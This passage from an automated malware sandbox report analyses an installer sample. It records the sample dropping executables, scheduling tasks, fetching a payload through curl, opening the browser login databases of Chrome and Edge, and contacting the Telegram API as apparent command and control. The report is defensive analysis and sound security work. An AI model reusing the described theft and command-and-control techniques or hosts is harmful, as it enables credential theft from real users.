    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\1.exe "c:\users\user\desktop\1.exe" /i "c:\users\user\appdata\roaming\atomix\atomix 1.0.0\install\69b1923\distributor software.msi" ai_euimsi=1 appdir="c:\program files (x86)\atomix" secondsequence="1" clientprocessid="7448" chaineruiprocessid="7448chainer" action="install" executeaction="install" clientuilevel="0" addlocal="mainfeature" primaryfolder="appdir" rootdrive="c:\" ai_detected_admin_user="1" ai_setupexepath="c:\users\user\desktop\1.exe" setupexedir="c:\users\user\desktop\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1741399570 " targetdir="c:\" ai_setupexepath_original="c:\users\user\desktop\1.exe" ai_install="1"Jump to behavior
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_009B6700 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle,11_2_009B6700
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A7C130 cpuid 11_2_00A7C130
    Source: C:\Users\user\Desktop\1.exeCode function: GetLocaleInfoW,11_2_00A9F27F
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\dialog.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\dialog.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\banner.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\banner.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\banner.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\banner.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7448\dialog.jpg VolumeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\Users\user\AppData\Local\Packages\TBioYkjtYu\output.zip VolumeInformation
    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\Users\user\AppData\Local\Packages\TBioYkjtYu\output.zip VolumeInformation
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A8597E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_00A8597E
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00857950 GetVersion,11_2_00857950
    Source: C:\Users\user\Desktop\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\Desktop\1.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 BlobJump to behavior

    Stealing of Sensitive Information

    barindex
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Replication Through Removable Media    		2
    Native API    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		11
    Disable or Modify Tools    		1
    OS Credential Dumping    		1
    System Time Discovery    		Remote Services1
    Archive Collected Data    		1
    Web Service    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts12
    Command and Scripting Interpreter    		1
    DLL Search Order Hijacking    		1
    DLL Search Order Hijacking    		1
    Deobfuscate/Decode Files or Information    		LSASS Memory11
    Peripheral Device Discovery    		Remote Desktop Protocol1
    Data from Local System    		1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Scheduled Task/Job    		1
    Scheduled Task/Job    		111
    Process Injection    		2
    Obfuscated Files or Information    		Security Account Manager4
    File and Directory Discovery    		SMB/Windows Admin SharesData from Network Shared Drive11
    Encrypted Channel    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
    Scheduled Task/Job    		1
    Timestomp    		NTDS36
    System Information Discovery    		Distributed Component Object ModelInput Capture3
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets121
    Security Software Discovery    		SSHKeylogging4
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Search Order Hijacking    		Cached Domain Credentials31
    Virtualization/Sandbox Evasion    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    File Deletion    		DCSync2
    Process Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job32
    Masquerading    		Proc Filesystem1
    Application Window Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    Modify Registry    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
    Virtualization/Sandbox Evasion    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd111
    Process Injection    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632500 Sample: 1.exe Startdate: 08/03/2025 Architecture: WINDOWS Score: 48 89 api.telegram.org 2->89 91 wetransfers.io 2->91 93 2 other IPs or domains 2->93 103 Suricata IDS alerts for network traffic 2->103 105 Multi AV Scanner detection for dropped file 2->105 107 Multi AV Scanner detection for submitted file 2->107 111 4 other signatures 2->111 9 1.exe 84 2->9         started        12 msiexec.exe 20 41 2->12         started        14 MainSoftware.exe 2->14         started        16 2 other processes 2->16 signatures3 109 Uses the Telegram API (likely for C&C communication) 89->109 process4 file5 65 C:\Users\user\AppData\...\MainSoftware.exe, PE32+ 9->65 dropped 67 C:\Users\user\...\SoftwareDistributor.exe, PE32+ 9->67 dropped 69 C:\Users\user\AppData\Local\Temp\shiA18.tmp, PE32+ 9->69 dropped 79 14 other malicious files 9->79 dropped 18 1.exe 6 9->18         started        71 C:\Windows\Installer\MSI8914.tmp, PE32 12->71 dropped 73 C:\Windows\Installer\MSI7B86.tmp, PE32 12->73 dropped 75 C:\Windows\Installer\MSI7B27.tmp, PE32 12->75 dropped 81 7 other malicious files 12->81 dropped 21 MainSoftware.exe 15 12->21         started        24 msiexec.exe 12 12->24         started        26 SoftwareDistributor.exe 12->26         started        30 2 other processes 12->30 77 C:\Program Files (x86)\Main\...\Install.exe, PE32+ 14->77 dropped 28 Install.exe 14->28         started        process6 dnsIp7 57 C:\Users\user\AppData\Local\...\shi56C1.tmp, PE32+ 18->57 dropped 95 jonatechlab.com 172.67.135.71 CLOUDFLARENETUS United States 21->95 32 schtasks.exe 21->32         started        34 schtasks.exe 21->34         started        97 swiftvantage.online 104.21.80.136, 443, 49701, 49703 CLOUDFLARENETUS United States 24->97 59 C:\Program Files (x86)\...\Install.exe.part, PE32+ 24->59 dropped 61 C:\Program Files (x86)\...\Install.exe (copy), PE32+ 24->61 dropped 36 schtasks.exe 26->36         started        38 cmd.exe 28->38         started        40 conhost.exe 28->40         started        file8 process9 process10 42 conhost.exe 32->42         started        44 conhost.exe 34->44         started        46 conhost.exe 36->46         started        48 regsvr32.exe 38->48         started        52 curl.exe 38->52         started        55 conhost.exe 38->55         started        dnsIp11 83 api.telegram.org 149.154.167.220 TELEGRAMRU United Kingdom 48->83 99 System process connects to network (likely due to code injection or exploit) 48->99 101 Tries to harvest and steal browser information (history, passwords, etc) 48->101 85 wetransfers.io 172.67.184.211 CLOUDFLARENETUS United States 52->85 87 127.0.0.1 unknown unknown 52->87 63 C:\Users\user\AppData\Local\Temp\219880.ocx, PE32+ 52->63 dropped file12 signatures13

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.